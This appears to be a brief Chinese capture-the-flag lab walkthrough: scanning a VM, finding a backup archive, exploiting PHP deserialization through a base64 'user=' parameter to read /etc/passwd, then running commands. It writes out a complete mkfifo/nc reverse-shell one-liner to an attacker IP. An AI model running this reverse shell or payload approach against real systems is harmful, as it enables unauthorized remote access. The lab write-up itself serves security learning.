打开虚拟机查看一下IP
然后进行端口扫描,可以看到最有可能的就是131,然后我们把这个地址用kali自带的nmap进行存活主机探测以及开放端口
然后我们先访问80端口,访问web服务
使用burp抓包发现有一串base64编码,解码后发现确实是序列化
然后dirb扫描目录发现没有什么有用的信息,然后再换dirsearch,扫描敏感目录和文件。发现了backup文件
我们访问这个目录会出来一个页面,我们点开bak.zip发现三个文件
接下来就构造一个查看文件的payload
保存在自己www目录下新建一个php文件
访问自己构造的payload,就是刚才新建的php。我们查看到了base64编码后的payload
将这串编码后的payload复制到user=的后面,可以查看到etc/passwd下的内容
在新建一个1.txt的文件
将之前咱们新建在自己www下的php文件里面的ip改为自己的本机地址
在访问得到下面这串payload复制到burp中
可以看到id的位置有回显,将下面的shell反弹命令复制到cmd=的后面
反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.81.129+8888+>/tmp/f
在kali里面用nc监听,显示监听成功